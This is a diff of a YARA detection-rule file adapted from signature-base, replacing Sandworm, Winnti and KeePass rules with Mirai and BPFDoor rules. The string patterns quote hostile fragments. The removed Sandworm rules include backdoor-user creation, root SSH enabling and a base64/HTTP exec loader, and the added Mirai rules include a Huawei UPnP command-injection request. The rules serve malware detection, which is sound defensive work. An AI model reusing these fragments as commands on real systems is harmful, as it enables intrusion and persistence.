+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L80-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d052792a674dfa2d93a048b550ea085c3b9225662fdb09bf4a602093b0527e38"
+		logic_hash = "138a7d0c5508f0168f09329e97f00d0aacef17297558338cd88a9dc3ddddfee3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
+		hash2 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
 
 	strings:
-		$s1 = "mysql_db:x:" ascii
-		$a1 = "root:x:"
-		$a2 = "daemon:x:"
+		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36" fullword ascii
+		$s2 = "GET /g.php HTTP/1.1" fullword ascii
+		$s3 = "https://%[^/]/%s" fullword ascii
+		$s4 = "pass\" value=\"[^\"]*\"" fullword ascii
+		$s5 = "jbeupq84v7.2y.net" fullword ascii
 
 	condition:
-		filesize < 4KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_PHP_Sandworm_May20_1 : FILE
+rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_1 : FILE
 {
 	meta:
-		description = "Detects GIF header PHP webshell used by Sandworm on compromised machines"
+		description = "Detects ELF Mirai variant"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b9ec02c2-fa83-5f21-95cf-3528047b2d01"
-		date = "2020-05-28"
-		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L86-L101"
+		id = "7bb28f03-03ba-581a-bc03-bd09a52787d9"
+		date = "2018-10-27"
+		modified = "2023-01-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L101-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d10f618c7b465c7691d6054e994a76f56c12eb0a36d2d98b5accd2c1e2c1da7"
+		logic_hash = "d16ed12522b310fccab027355281a206f5087d555f0d1fef4e7746d01d085613"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		hash1 = "3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe"
 
 	strings:
-		$h1 = "GIF89a <?php $" ascii
-		$s1 = "str_replace(" ascii
+		$x1 = " -r /vi/mips.bushido; "
+		$x2 = "/bin/busybox chmod 777 * /tmp/" ascii
+		$s1 = "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" fullword ascii
+		$s2 = "loadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>" fullword ascii
+		$s3 = "POST /cdn-cgi/" ascii
 
 	condition:
-		filesize < 10KB and $h1 at 0 and $s1
+		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or all of ( $x* ) )
 }
-rule SIGNATURE_BASE_APT_SH_Sandworm_Shell_Script_May20_1 : FILE
+rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_2 : FILE
 {
 	meta:
-		description = "Detects shell script used by Sandworm in attack against Exim mail server"
+		description = "Detects ELF malware Mirai related"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21cf2c89-5511-5eb6-a2dd-4ad54ebfa2d1"
-		date = "2020-05-28"
+		id = "421b7708-030e-50d1-bf2e-e91758a48c00"
+		date = "2018-10-27"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L103-L129"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L124-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b9116585e74ad6159cd31c0c8a84566f981a62ca5b5f82ace8b855a180461071"
+		logic_hash = "47d20bdf64c18c925dc1391b022278f913b7fbce13988a7b5de2e9d135c5a265"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		hash1 = "fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9"
 
 	strings:
-		$x1 = "echo \"GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';\" >> init-file.txt" ascii fullword
-		$x2 = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version" ascii fullword
-		$x3 = "sed -i -e '/PasswordAuthentication/s/no/yes/g; /PermitRootLogin/s/no/yes/g;" ascii fullword
-		$x4 = "useradd -M -l -g root -G root -b /root -u 0 -o mysql_db" ascii fullword
-		$s1 = "/ip.php?port=${PORT}\"" ascii fullword
-		$s2 = "sed -i -e '/PasswordAuthentication" ascii fullword
-		$s3 = "PATH_KEY=/root/.ssh/authorized_keys" ascii fullword
-		$s4 = "CREATE USER" ascii fullword
-		$s5 = "crontab -l | { cat; echo" ascii fullword
-		$s6 = "mysqld --user=mysql --init-file=/etc/opt/init-file.txt --console" ascii fullword
-		$s7 = "sshkey.php" ascii fullword
+		$c01 = { 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00
+               20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D
+               41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A }
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) or 4 of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_1 : FILE
+rule SIGNATURE_BASE_MAL_Mirai_Nov19_1 : FILE
 {
 	meta:
-		description = "Detects Sandworm Python loader"
+		description = "Detects Mirai malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a392d800-1fe8-5ae9-b813-e1dfcedecda6"
-		date = "2020-05-28"
+		id = "40edcb29-9e10-5b87-ba79-8e3f629829e5"
+		date = "2019-11-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L131-L148"
+		reference = "https://twitter.com/bad_packets/status/1194049104533282816"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L140-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ccc4c7fc75c04cbcab34904de2e7ab055a15c1017ec0f8d01b06454f4395047"
+		logic_hash = "e1202a9cd445c590c359a9c93e635292f8cf7f09291f4d8504ad9ce6679f6a47"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c025008463fdbf44b2f845f2d82702805d931771aea4b506573b83c8f58bccca"
+		hash1 = "bbb83da15d4dabd395996ed120435e276a6ddfbadafb9a7f096597c869c6c739"
+		hash2 = "fadbbe439f80cc33da0222f01973f27cce9f5ab0709f1bfbf1a954ceac5a579b"
 
 	strings:
-		$x1 = "o.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')]" ascii fullword
-		$s1 = "exec(o.open('http://" ascii
-		$s2 = "__import__({2:'urllib2',3:'urllib.request'}"
+		$s1 = "SERVZUXO" fullword ascii
+		$s2 = "-loldongs" fullword ascii
+		$s3 = "/dev/null" fullword ascii
+		$s4 = "/bin/busybox" fullword ascii
+		$sc1 = { 47 72 6F 75 70 73 3A 09 30 }
 
 	condition:
-		uint16( 0 ) == 0x6d69 and filesize < 1KB and 1 of ( $x* ) or 2 of them
+		uint16( 0 ) == 0x457f and filesize <= 100KB and 4 of them
 }
-rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_2 : FILE
+rule SIGNATURE_BASE_MAL_ARM_LNX_Mirai_Mar13_2022 : FILE
 {
 	meta:
-		description = "Detects Sandworm Python loader"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b32ad64-d959-5632-a03c-17aa055b213f"
-		date = "2020-05-28"
+		description = "Detects new ARM Mirai variant"
+		author = "Mehmet Ali Kerimoglu a.k.a. CYB3RMX"
+		id = "54d8860e-fc45-5571-b68c-66590c67a705"
+		date = "2022-03-16"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L150-L167"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L159-L181"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5fb61a9cef64ecf97adc78bf67db667cfd9e5e6f3e03f1bba8f3cdbf6c257520"
+		logic_hash = "a44a6174a198a658c8a5e2da50192da20bae7f8ed4e4f212c9eebb29fa4b0dd0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "abfa83cf54db8fa548942acd845b4f34acc94c46d4e1fb5ce7e97cc0c6596676"
+		hash1 = "0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68"
 
 	strings:
-		$x1 = "import sys;import re, subprocess;cmd" ascii fullword
-		$x2 = "UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http"
-		$x3 = "';t='/admin/get.php';req" ascii
-		$x4 = "ps -ef | grep Little\\ Snitch | grep " ascii fullword
+		$str1 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
+		$str2 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
+		$str3 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm"
+		$str4 = "/home/landley/aboriginal/aboriginal/build/simple-cross-compiler-armv6l/bin/../cc/include"
+		$attck1 = "attack.c"
+		$attck2 = "attacks.c"
+		$attck3 = "anti_gdb_entry"
+		$attck4 = "resolve_cnc_addr"
+		$attck5 = "attack_gre_eth"
+		$attck6 = "attack_udp_generic"
+		$attck7 = "attack_get_opt_ip"
+		$attck8 = "attack_icmpecho"
 
 	condition:
-		uint16( 0 ) == 0x6d69 and filesize < 2KB and 1 of them
+		uint16( 0 ) == 0x457f and ( 3 of ( $str* ) or 4 of ( $attck* ) )
 }
-rule SIGNATURE_BASE_Icefog_Malware_Feb18_1 : FILE
+rule SIGNATURE_BASE_MAL_LNX_Redmenshen_Bpfdoor_May23_1 : FILE
 {
 	meta:
-		description = "Detects IceFog malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce8e3a9b-9f4b-534c-983d-bb5490da5768"
-		date = "2018-02-26"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/ClearskySec/status/968104465818669057"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_icefog.yar#L11-L32"
+		description = "Detects BPFDoor malware"
+		author = "Florian Roth"
+		id = "25df4dba-ec6e-5999-b6be-56fe933cb0d0"
+		date = "2023-05-11"
+		modified = "2023-12-05"
+		reference = "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L3-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bba0f7f6f6aad6586c2c5ed29f30514d2f88703134f331724cc2ff86ccffe87"
-		score = 75
+		logic_hash = "c58971a43443800256e791b4f9fe7c3221518b0050e5f2964b6c843ddb4549ac"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "480373cffc4e60aa5be2954a156e37d689b92e6e33969958230f2ce59d30b9ec"
+		hash1 = "afa8a32ec29a31f152ba20a30eb483520fe50f2dce6c9aa9135d88f7c9c511d7"
 
 	strings:
-		$s1 = "cmd /c %c%s%c" fullword ascii
-		$s2 = "temp.bat" fullword ascii
-		$s3 = "c:\\windows\\debug\\wia\\help" fullword wide
-		$s4 = "/getorder.aspx?hostname=" fullword wide
-		$s5 = "\\filecfg_temp.dat" wide
-		$s6 = "Unknown operating system " fullword wide
-		$s7 = "kastygost.compress.to" fullword wide
-		$s8 = "/downloads/" wide
-		$s9 = "\\key.dat" wide
+		$x1 = "[-] Execute command failed" ascii fullword
+		$x2 = "/var/run/initd.lock" ascii fullword
+		$xc1 = { 2F 00 3E 3E 00 65 78 69 74 00 72 00 }
+		$sc1 = { 9F CD 30 44 }
+		$sc2 = { 66 27 14 5E }
+		$sa1 = "TLS-CHACHA20-POLY1305-SHA256" ascii fullword
+		$sop1 = { 48 83 c0 01 4c 39 f8 75 ea 4c 89 7c 24 68 48 69 c3 d0 00 00 00 48 8b 5c 24 50 48 8b 54 24 78 48 c7 44 24 38 00 00 00 00 }
+		$sop2 = { 48 89 de f3 a5 89 03 8b 44 24 2c 39 44 24 28 44 89 4b 04 48 89 53 10 0f 95 c0 }
+		$sop3 = { 49 d3 cd 4d 31 cd b1 29 49 89 e9 49 d3 c8 4d 31 c5 4c 03 68 10 48 89 f9 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them
+		uint16( 0 ) == 0x457f and filesize < 900KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of them or ( all of ( $sc* ) and $sc1 in ( @sc2 [ 1 ] -50 .. @sc2 [ 1 ] + 50 ) ) ) or ( 2 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Twinpeaks : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_1 : FILE
 {
 	meta:
-		description = "Detects Winnti samples"
-		author = "@br_data repo"
-		id = "2e4e2b88-fdb4-5adc-8192-a304d71ca851"
-		date = "2019-07-24"
+		description = "Detects unknown Linux implants (uploads from KR and MO)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1438c3bf-3c42-59d5-9f3f-2d72bdaaac42"
+		date = "2022-05-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/br-data/2019-winnti-analyse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_br.yar#L3-L15"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L45-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76457f5aa4cc4bf4f43ffbaa60d63006455977e881f1d74b845835c505a93fed"
-		score = 75
+		logic_hash = "8de10beea4ef2e059b16d38fb015d6f091cc517b6f0c06b6ef6868518349994d"
+		score = 90
 		quality = 85
 		tags = "FILE"
+		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
+		hash2 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
+		hash3 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
+		hash4 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
+		hash5 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
+		hash6 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
+		hash7 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
+		hash8 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
+		hash9 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
+		hash10 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
 
 	strings:
-		$cooper = "Cooper"
-		$pattern = { e9 ea eb ec ed ee ef f0}
+		$s1 = "[-] Connect failed." ascii fullword
+		$s2 = "export MYSQL_HISTFILE=" ascii fullword
+		$s3 = "udpcmd" ascii fullword
+		$s4 = "getshell" ascii fullword
+		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
+		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
+		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
+		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $cooper and ( $pattern in ( @cooper [ 1 ] .. @cooper [ 1 ] + 100 ) )
+		uint16( 0 ) == 0x457f and filesize < 80KB and 2 of them or 5 of them
 }
-
-rule SIGNATURE_BASE_MAL_BR_Report_Thedao : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_2 : FILE
 {
 	meta:
-		description = "Detects indicator in malicious UPX packed samples"
-		author = "@br_data repo"
-		id = "5cc932d7-2ec6-5570-af4a-3f64b39e6db5"
-		date = "2019-07-24"
+		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5c3d530-ed6f-563e-a3b0-55d4c82e4899"
+		date = "2022-05-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/br-data/2019-winnti-analyse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_br.yar#L17-L28"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L78-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "798b092b7667462aa66590603504cb0cd1166e4ac3472627cd8cd8fdf8f0b778"
-		score = 75
-		quality = 60
+		logic_hash = "7525c675dbba6eb480f1d28fc6db05bd9907725c291e64ee6dc2453fd42892a0"
+		score = 85
+		quality = 85
 		tags = "FILE"
+		hash1 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
+		hash2 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
+		hash3 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
+		hash4 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
 
 	strings:
-		$b = { DA A0 }
+		$opx1 = { 48 83 c0 0c 48 8b 95 e8 fe ff ff 48 83 c2 0c 8b 0a 8b 55 f0 01 ca 89 10 c9 }
+		$opx2 = { 48 01 45 e0 83 45 f4 01 8b 45 f4 3b 45 dc 7c cd c7 45 f4 00 00 00 00 eb 2? 48 8b 05 ?? ?? 20 00 }
+		$op1 = { 48 8d 14 c5 00 00 00 00 48 8b 45 d0 48 01 d0 48 8b 00 48 89 c7 e8 ?? ?? ff ff 48 83 c0 01 48 01 45 e0 }
+		$op2 = { 89 c2 8b 85 fc fe ff ff 01 c2 8b 45 f4 01 d0 2d 7b cf 10 2b 89 45 f4 c1 4d f4 10 }
+		$op3 = { e8 ?? d? ff ff 8b 45 f0 eb 12 8b 85 3c ff ff ff 89 c7 e8 ?? d? ff ff b8 ff ff ff ff c9 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $b at pe.overlay.offset and pe.overlay.size > 100
+		uint16( 0 ) == 0x457f and filesize < 100KB and 2 of ( $opx* ) or 4 of them
 }
-rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Mockingjay : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_3 : FILE
 {
 	meta:
-		description = "Detects Winnti samples"
-		author = "@br_data repo"
-		id = "9aff9d65-3827-59de-9dc3-38f227155d3d"
-		date = "2019-07-24"
+		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
+		author = "Florian Roth (Nextron Systems)"
+		id = "91c2153a-a6e0-529e-852c-61f799838798"
+		date = "2022-05-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/br-data/2019-winnti-analyse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_br.yar#L30-L46"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L102-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a63b6f10cc5feebba16e585cb29d741876e1dc7f4dde3ef43ac76db9c7ad135"
-		score = 75
+		logic_hash = "afec0bfeddf5c5c2abc1a3173f636c385437e5d7c0b68665f6274011113a6a9c"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		hash1 = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3"
+		hash2 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
 
 	strings:
-		$load_magic = { C7 44 ?? ?? FF D8 FF E0 }
-		$iter = { E9 EA EB EC ED EE EF F0 }
-		$jpeg = { FF D8 FF E0 00 00 00 00 00 00 }
+		$s1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
+		$s2 = "/sbin/mingetty /dev" ascii fullword
+		$s3 = "pickup -l -t fifo -u" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $jpeg and ( $load_magic or $iter in ( @jpeg [ 1 ] .. @jpeg [ 1 ] + 200 ) ) and for any i in ( 1 .. #jpeg ) : ( uint8( @jpeg [ i ] + 11 ) != 0 )
+		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_VULN_Keepass_DB_Brute_Forcible : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_Generic_May22_1 : FILE
 {
 	meta:
-		description = "Detects KeePass .kdbx password stores, which could be brute forced to steal the credentials. With AES-KDF and less than 65536 iterations the cracking speed with a single GPU is 20k/s, for the old default of 6.000 iterations it's 200k/s. Best remediation is to change the key derivative function to Argon2d and delete all older versions of the .kdbx"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b1a86e03-b3d1-5abc-9287-a4846451caff"
-		date = "2023-07-20"
+		description = "Detects BPFDoor malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d30df2ae-7008-53c0-9a61-8346a9c9f465"
+		date = "2022-05-09"
 		modified = "2023-12-05"
-		reference = "https://keepass.info/help/base/security.html#secdictprotect"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_keepass_brute_forcible.yar#L2-L17"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L121-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14460f7d4976a3bbd6de2f7cfccfbfec35eb780ab762396a6490669ddde59ce8"
-		score = 60
+		logic_hash = "57ae5f7dc1d202fe66d6626ef2bf2278b92bec0310449ce049bdaeaec5657c77"
+		score = 90
 		quality = 85
 		tags = "FILE"
+		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
+		hash2 = "1925e3cd8a1b0bba0d297830636cdb9ebf002698c8fa71e0063581204f4e8345"
+		hash3 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
+		hash4 = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78"
+		hash5 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
+		hash6 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
+		hash7 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
+		hash8 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
+		hash9 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
+		hash10 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
+		hash11 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
+		hash12 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
+		hash13 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
+		hash14 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
+		hash15 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
+		hash16 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
+		hash17 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
 
 	strings:
-		$keepass_magic = { 03 D9 A2 9A 67 FB 4B B5 }
-		$below_65536_rounds = { 06 08 00 ?? ?? 00 00 00 00 00 00 07 10 00 }
+		$op1 = { c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 ?? 88 45 }
+		$op2 = { 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 }
+		$op3 = { 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 88 45 f? c7 45 f8 00 00 00 00 }
+		$op4 = { 48 89 7d d8 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? }
+		$op5 = { 48 8b 45 ?8 c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 }
+		$op6 = { 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 }
 
 	condition:
-		$keepass_magic at 0 and $below_65536_rounds at 108
+		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or 4 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Maldoc_Cloudatlas_Oct20_1 : FILE
+rule SIGNATURE_BASE_MAL_Envrial_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects unknown maldoc dropper noticed in October 2020"
